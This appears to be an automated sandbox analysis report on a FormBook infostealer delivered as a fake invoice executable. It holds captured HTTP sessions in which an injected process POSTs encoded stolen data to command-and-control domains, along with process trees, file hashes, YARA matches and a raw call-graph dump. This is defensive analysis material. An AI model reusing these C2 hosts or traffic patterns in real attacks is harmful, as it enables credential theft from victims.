                                                            11 | 192.168.2.6 | 49958 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:54.780652046 CET | 1865 | OUT | POST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7= [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.6 | 49964 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:57.439598083 CET | 550 | OUT | GET /slxp/?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:58.578916073 CET | 403 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:45:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h"}</script></head></html>


                                                            Session ID: 13
                                                            Source IP: 192.168.2.6
                                                            Source Port: 49980
                                                            Destination IP: 3.33.130.190
                                                            Destination Port: 80
                                                            PID: 3196
                                                            Process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp: Nov 25, 2024 13:46:04.384766102 CET
                                                            Bytes transferred: 810
                                                            Direction: OUT
                                                            Data: POST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gv7wmnW6N8ZMcSySwI/V4yij/Cdc6/sFNaW2uZ+vYJa+L


                                                            Session ID: 14
                                                            Source IP: 192.168.2.6
                                                            Source Port: 49986
                                                            Destination IP: 3.33.130.190
                                                            Destination Port: 80
                                                            PID: 3196
                                                            Process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp: Nov 25, 2024 13:46:07.180429935 CET
                                                            Bytes transferred: 834
                                                            Direction: OUT
                                                            Data: POST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyD9CfEI/MFnYWOuLpj/GuboRgh3GwhGq29pANGTaQWHjQ==


                                                            Session ID: 15
                                                            Source IP: 192.168.2.6
                                                            Source Port: 49994
                                                            Destination IP: 3.33.130.190
                                                            Destination Port: 80
                                                            PID: 3196
                                                            Process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp: Nov 25, 2024 13:46:10.116610050 CET
                                                            Bytes transferred: 1847
                                                            Direction: OUT
                                                            Data: POST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKZ10jybSBcMC/5AUSViwLaSXIvnDVwp+IhEijV1WOoiARBvehYuZHzWISjj2vqtD9ixWIU24itUBPmmU1usKqrmNMVRtV4e4tziGqgGjqTEqmRB7uZRd9yfAPASmTdhU1dHBQOi99PG/m3lbg+2yVj7rFTfUd9UtoFEcgBdksW/G/frLwS9kndSRG4tuy7lIRtSvNjH5lNVvhVtdhnqH1A41f2Mulzfbuix7NBgRXkToV+vK3mw8R7fIGWoP5OOGYxn7FsN6fbYqafHq/3i38fgkjKyba6lCIS+yIyY1I75Q+FNJtRKm9ilKarEtEc4i9PgcRuYOn7JD+cfqcD3HVSp6k4k5wJw/bGZH3KpL9B8BI3VJxK4DNq1N9PvaMIned4I0tLh1ivgv4Oi0jOfHKjp4Joqe/Dck0PVnANi3Dk6XJESjAzPA2VIvMQNY7nxjDFElwnZmS9dGXSSdboswlFPyiAiWpQs/6tEAZJzdi4WrsjGpJp3zjSpKbJ5vdrbWbIdLCxWgh9GiQRrere0fX6yT41LVHs8LDny7FBj6mDdiCWjOvtDR6/UeVc7IJdP9DuhOWBZFgQbLkPGLHEhH5hEd35kCh08WA9DBPJjbHAj1eH8mroU0rlz8pEXRUgTE5c+d8j1zlFYVxx5YpK/qoAUTdHoiO3gej2XfJcIny6mWWvxqXoKOVIg7rRNEvMzDL3PbUOBsKX6NeQEWs+sNQ+JmFzfQ/tmDCbTZqY6FrD5Vv/PCPo5KWCIQj67DKkd7sJzod0gbfG3c8E8PzYm5caRd175W0iYU2rJX8cHGHhj6SKZFbgLVrsOwL/dblXVi [TRUNCATED]


                                                            Session ID: 16
                                                            Source IP: 192.168.2.6
                                                            Source Port: 50004
                                                            Destination IP: 3.33.130.190
                                                            Destination Port: 80
                                                            PID: 3196
                                                            Process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp: Nov 25, 2024 13:46:12.879642010 CET
                                                            Bytes transferred: 544
                                                            Direction: OUT
                                                            Data: GET /0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Timestamp: Nov 25, 2024 13:46:13.971539974 CET
                                                            Bytes transferred: 403
                                                            Direction: IN
                                                            Data: HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:46:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h"}</script></head></html>


                                                            Target ID:2
                                                            Start time:07:44:11
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                                                            Imagebase:0x1f0000
                                                            File size:1'212'928 bytes
                                                            MD5 hash:FAF30D977546A3527433829420A666C5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:07:44:12
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                                                            Imagebase:0xe60000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:07:44:37
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe"
                                                            Imagebase:0xf70000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:07:44:40
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\srdelayed.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                            Imagebase:0xa0000
                                                            File size:16'384 bytes
                                                            MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:07:44:40
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\ktmutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                            Imagebase:0x770000
                                                            File size:15'360 bytes
                                                            MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:07:44:54
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe"
                                                            Imagebase:0xf70000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:16
                                                            Start time:07:45:06
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff728280000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                              Execution Graph

                                                              Execution Coverage:4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:9.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:57
calls 2 library calls 92790->92911 92912 23cc5c 86 API calls 4 library calls 92792->92912 92793 1fef26 92793->92699 92795 2686f9 92795->92795 92797 1ff130 92796->92797 92799 1ffe30 331 API calls 92797->92799 92803 1ff199 92797->92803 92798 1ff3dd 92802 2687c8 92798->92802 92810 1ff3f2 92798->92810 92848 1ff431 Mailbox 92798->92848 92801 268728 92799->92801 92800 1ff595 92806 1fd7f7 48 API calls 92800->92806 92800->92848 92801->92803 92930 23cc5c 86 API calls 4 library calls 92801->92930 92933 23cc5c 86 API calls 4 library calls 92802->92933 92803->92798 92803->92800 92808 1fd7f7 48 API calls 92803->92808 92839 1ff229 92803->92839 92807 2687a3 92806->92807 92932 210f0a 52 API calls __cinit 92807->92932 92812 268772 92808->92812 92838 1ff418 92810->92838 92934 239af1 48 API calls 92810->92934 92811 268b1b 92822 268bcf 92811->92822 92823 268b2c 92811->92823 92931 210f0a 52 API calls __cinit 92812->92931 92813 1fd6e9 55 API calls 92813->92848 92815 1ff770 92818 268a45 92815->92818 92837 1ff77a 92815->92837 92817 268b7e 92943 24e40a 331 API calls Mailbox 92817->92943 92940 20c1af 48 API calls 92818->92940 92819 268c53 92948 23cc5c 86 API calls 4 library calls 92819->92948 92820 268810 92935 24eef8 331 API calls 92820->92935 92821 1ffe30 331 API calls 92840 1ff6aa 92821->92840 92945 23cc5c 86 API calls 4 library calls 92822->92945 92942 24f5ee 331 API calls 92823->92942 92824 268beb 92946 24bdbd 331 API calls Mailbox 92824->92946 92826 1ffe30 331 API calls 92826->92848 92835 201b90 48 API calls 92835->92848 92836 268c00 92860 1ff537 Mailbox 92836->92860 92947 23cc5c 86 API calls 4 library calls 92836->92947 92913 201b90 92837->92913 92838->92811 92838->92840 92838->92848 92839->92798 92839->92800 92839->92838 92839->92848 92840->92815 92840->92821 92841 1ffce0 92840->92841 92840->92848 92840->92860 92841->92860 92944 23cc5c 86 API calls 4 library calls 92841->92944 92843 268823 92843->92838 92847 26884b 92843->92847 92846 23cc5c 86 API calls 92846->92848 92936 24ccdc 48 
API calls 92847->92936 92848->92813 92848->92817 92848->92819 92848->92824 92848->92826 92848->92835 92848->92841 92848->92846 92848->92860 92929 1fdd47 48 API calls _memcpy_s 92848->92929 92941 2297ed InterlockedDecrement 92848->92941 92949 20c1af 48 API calls 92848->92949 92850 268857 92852 268865 92850->92852 92853 2688aa 92850->92853 92937 239b72 48 API calls 92852->92937 92856 2688a0 Mailbox 92853->92856 92938 23a69d 48 API calls 92853->92938 92854 1ffe30 331 API calls 92854->92860 92856->92854 92858 2688e7 92939 1fbc74 48 API calls 92858->92939 92860->92699 92862 204637 92861->92862 92863 20479f 92861->92863 92864 266e05 92862->92864 92865 204643 92862->92865 92866 1fce19 48 API calls 92863->92866 93012 24e822 92864->93012 93011 204300 331 API calls _memcpy_s 92865->93011 92873 2046e4 Mailbox 92866->92873 92869 204739 Mailbox 92869->92699 92870 266e11 92870->92869 93052 23cc5c 86 API calls 4 library calls 92870->93052 92872 204659 92872->92869 92872->92870 92872->92873 92952 236524 92873->92952 92955 1f4252 92873->92955 92961 23fa0c 92873->92961 93002 246ff0 92873->93002 92879 20e253 92878->92879 92880 26df42 92878->92880 92879->92699 92881 26df77 92880->92881 92882 26df59 TranslateAcceleratorW 92880->92882 92882->92879 92884 20dca3 92883->92884 92885 20dc71 92883->92885 92884->92699 92885->92884 92886 20dc96 IsDialogMessageW 92885->92886 92887 26dd1d GetClassLongW 92885->92887 92886->92884 92886->92885 92887->92885 92887->92886 92888->92699 92889->92642 92890->92646 92891->92651 92892->92699 92893->92699 92895 20f4ea 48 API calls 92894->92895 92896 1fd818 92895->92896 92897 20f4ea 48 API calls 92896->92897 92898 1fd826 92897->92898 92898->92691 92899->92691 92900->92691 92902 1fce28 __wsetenvp 92901->92902 92903 20ee75 48 API calls 92902->92903 92904 1fce50 _memcpy_s 92903->92904 92905 20f4ea 48 API calls 92904->92905 92906 1fce66 92905->92906 92906->92691 92907->92691 92908->92691 92909->92691 92910->92691 92911->92793 92912->92795 92914 201cf6 92913->92914 
92916 201ba2 92913->92916 92914->92848 92915 201bae 92923 201bb9 92915->92923 92951 20c15c 48 API calls 92915->92951 92916->92915 92918 20f4ea 48 API calls 92916->92918 92919 2649c4 92918->92919 92920 20f4ea 48 API calls 92919->92920 92928 2649cf 92920->92928 92921 201c5d 92921->92848 92922 20f4ea 48 API calls 92924 201c9f 92922->92924 92923->92921 92923->92922 92925 201cb2 92924->92925 92950 1f2925 48 API calls 92924->92950 92925->92848 92927 20f4ea 48 API calls 92927->92928 92928->92915 92928->92927 92929->92848 92930->92803 92931->92839 92932->92848 92933->92860 92934->92820 92935->92843 92936->92850 92937->92856 92938->92858 92939->92856 92940->92848 92941->92848 92942->92848 92943->92841 92944->92860 92945->92860 92946->92836 92947->92860 92948->92860 92949->92848 92950->92925 92951->92923 93053 236ca9 GetFileAttributesW 92952->93053 92956 1f425c 92955->92956 92958 1f4263 92955->92958 93057 2135e4 92956->93057 92959 1f4283 FreeLibrary 92958->92959 92960 1f4272 92958->92960 92959->92960 92960->92869 92962 23fa1c __ftell_nolock 92961->92962 92963 23fa44 92962->92963 93466 1fd286 48 API calls 92962->93466 93363 1f936c 92963->93363 92966 23fa5e 92967 23fb92 92966->92967 92968 23fa80 92966->92968 92969 23fb68 92966->92969 92967->92869 92970 1f936c 81 API calls 92968->92970 93383 1f41a9 92969->93383 92977 23fa8c _wcscpy _wcschr 92970->92977 92973 23fb8e 92973->92967 92974 1f936c 81 API calls 92973->92974 92976 23fbc7 92974->92976 92975 1f41a9 136 API calls 92975->92973 93407 211dfc 92976->93407 92979 23fade _wcscat 92977->92979 92981 23fab0 _wcscat _wcscpy 92977->92981 92980 1f936c 81 API calls 92979->92980 92982 23fafc _wcscpy 92980->92982 92983 1f936c 81 API calls 92981->92983 93467 2372cb GetFileAttributesW 92982->93467 92983->92979 92985 23fb1c __wsetenvp 92985->92967 92986 1f936c 81 API calls 92985->92986 92987 23fb48 92986->92987 93468 2360dd 77 API calls 4 library calls 92987->93468 92988 23fbeb _wcscat _wcscpy 92990 1f936c 81 API calls 92988->92990 92992 
23fc82 92990->92992 92991 23fb5c 92991->92967 93410 23690b 92992->93410 92994 23fca2 92995 236524 3 API calls 92994->92995 92996 23fcb1 92995->92996 92997 1f936c 81 API calls 92996->92997 93000 23fce2 92996->93000 92998 23fccb 92997->92998 93416 23bfa4 92998->93416 93001 1f4252 84 API calls 93000->93001 93001->92967 93003 1f936c 81 API calls 93002->93003 93004 24702a 93003->93004 93799 1fb470 93004->93799 93006 24703a 93007 24705f 93006->93007 93008 1ffe30 331 API calls 93006->93008 93010 247063 93007->93010 93827 1fcdb9 48 API calls 93007->93827 93008->93007 93010->92869 93011->92872 93013 24e84e 93012->93013 93014 24e868 93012->93014 93857 23cc5c 86 API calls 4 library calls 93013->93857 93858 24ccdc 48 API calls 93014->93858 93017 24e871 93018 1ffe30 330 API calls 93017->93018 93019 24e8cf 93018->93019 93020 24e96a 93019->93020 93022 24e916 93019->93022 93051 24e860 Mailbox 93019->93051 93021 24e978 93020->93021 93024 24e9c7 93020->93024 93860 23a69d 48 API calls 93021->93860 93859 239b72 48 API calls 93022->93859 93027 1f936c 81 API calls 93024->93027 93024->93051 93026 24e949 93029 2045e0 330 API calls 93026->93029 93030 24e9e1 93027->93030 93028 24e99b 93861 1fbc74 48 API calls 93028->93861 93029->93051 93032 1fbdfa 48 API calls 93030->93032 93034 24ea05 CharUpperBuffW 93032->93034 93033 24e9a3 Mailbox 93036 203200 330 API calls 93033->93036 93035 24ea1f 93034->93035 93037 24ea26 93035->93037 93038 24ea72 93035->93038 93036->93051 93862 239b72 48 API calls 93037->93862 93039 1f936c 81 API calls 93038->93039 93040 24ea7a 93039->93040 93863 1f1caa 49 API calls 93040->93863 93043 24ea54 93044 2045e0 330 API calls 93043->93044 93044->93051 93045 24ea84 93046 1f936c 81 API calls 93045->93046 93045->93051 93047 24ea9f 93046->93047 93864 1fbc74 48 API calls 93047->93864 93049 24eaaf 93050 203200 330 API calls 93049->93050 93050->93051 93051->92870 93052->92869 93054 236cc4 FindFirstFileW 93053->93054 93055 236529 93053->93055 93054->93055 93056 236cd9 FindClose 
93054->93056 93055->92869 93056->93055 93058 2135f0 __fcloseall 93057->93058 93059 213604 93058->93059 93060 21361c 93058->93060 93092 217c0e 47 API calls __getptd_noexit 93059->93092 93063 213614 __fcloseall 93060->93063 93070 214e1c 93060->93070 93062 213609 93093 216e10 8 API calls _memcpy_s 93062->93093 93063->92958 93071 214e2c 93070->93071 93072 214e4e EnterCriticalSection 93070->93072 93071->93072 93073 214e34 93071->93073 93074 21362e 93072->93074 93095 217cf4 93073->93095 93076 213578 93074->93076 93077 213587 93076->93077 93078 21359b 93076->93078 93180 217c0e 47 API calls __getptd_noexit 93077->93180 93084 213597 93078->93084 93140 212c84 93078->93140 93080 21358c 93181 216e10 8 API calls _memcpy_s 93080->93181 93094 213653 LeaveCriticalSection LeaveCriticalSection _fprintf 93084->93094 93088 2135b5 93157 21e9d2 93088->93157 93090 2135bb 93090->93084 93091 211c9d _free 47 API calls 93090->93091 93091->93084 93092->93062 93093->93063 93094->93063 93096 217d05 93095->93096 93097 217d18 EnterCriticalSection 93095->93097 93102 217d7c 93096->93102 93097->93074 93099 217d0b 93099->93097 93126 21115b 47 API calls 3 library calls 93099->93126 93103 217d88 __fcloseall 93102->93103 93104 217d91 93103->93104 93105 217da9 93103->93105 93127 2181c2 47 API calls __NMSG_WRITE 93104->93127 93106 217e11 __fcloseall 93105->93106 93120 217da7 93105->93120 93106->93099 93109 217d96 93128 21821f 47 API calls 7 library calls 93109->93128 93110 217dbd 93112 217dd3 93110->93112 93113 217dc4 93110->93113 93116 217cf4 __lock 46 API calls 93112->93116 93131 217c0e 47 API calls __getptd_noexit 93113->93131 93114 217d9d 93129 211145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93114->93129 93119 217dda 93116->93119 93118 217dc9 93118->93106 93121 217de9 InitializeCriticalSectionAndSpinCount 93119->93121 93122 217dfe 93119->93122 93120->93105 93130 2169d0 47 API calls __crtLCMapStringA_stat 93120->93130 93123 217e04 93121->93123 93132 211c9d 93122->93132 93138 
217e1a LeaveCriticalSection _doexit 93123->93138 93127->93109 93128->93114 93130->93110 93131->93118 93133 211ca6 RtlFreeHeap 93132->93133 93137 211ccf _free 93132->93137 93134 211cbb 93133->93134 93133->93137 93139 217c0e 47 API calls __getptd_noexit 93134->93139 93136 211cc1 GetLastError 93136->93137 93137->93123 93138->93106 93139->93136 93141 212c97 93140->93141 93145 212cbb 93140->93145 93142 212933 __filbuf 47 API calls 93141->93142 93141->93145 93143 212cb4 93142->93143 93182 21af61 93143->93182 93146 21eb36 93145->93146 93147 21eb43 93146->93147 93149 2135af 93146->93149 93148 211c9d _free 47 API calls 93147->93148 93147->93149 93148->93149 93150 212933 93149->93150 93151 212952 93150->93151 93152 21293d 93150->93152 93151->93088 93319 217c0e 47 API calls __getptd_noexit 93152->93319 93154 212942 93320 216e10 8 API calls _memcpy_s 93154->93320 93156 21294d 93156->93088 93158 21e9de __fcloseall 93157->93158 93159 21e9e6 93158->93159 93160 21e9fe 93158->93160 93336 217bda 47 API calls __getptd_noexit 93159->93336 93162 21ea7b 93160->93162 93167 21ea28 93160->93167 93340 217bda 47 API calls __getptd_noexit 93162->93340 93163 21e9eb 93337 217c0e 47 API calls __getptd_noexit 93163->93337 93166 21ea80 93341 217c0e 47 API calls __getptd_noexit 93166->93341 93170 21a8ed ___lock_fhandle 49 API calls 93167->93170 93168 21e9f3 __fcloseall 93168->93090 93172 21ea2e 93170->93172 93171 21ea88 93342 216e10 8 API calls _memcpy_s 93171->93342 93174 21ea41 93172->93174 93175 21ea4c 93172->93175 93321 21ea9c 93174->93321 93338 217c0e 47 API calls __getptd_noexit 93175->93338 93178 21ea47 93339 21ea73 LeaveCriticalSection __unlock_fhandle 93178->93339 93180->93080 93181->93084 93183 21af6d __fcloseall 93182->93183 93184 21af75 93183->93184 93185 21af8d 93183->93185 93280 217bda 47 API calls __getptd_noexit 93184->93280 93187 21b022 93185->93187 93192 21afbf 93185->93192 93285 217bda 47 API calls __getptd_noexit 93187->93285 93188 21af7a 93281 217c0e 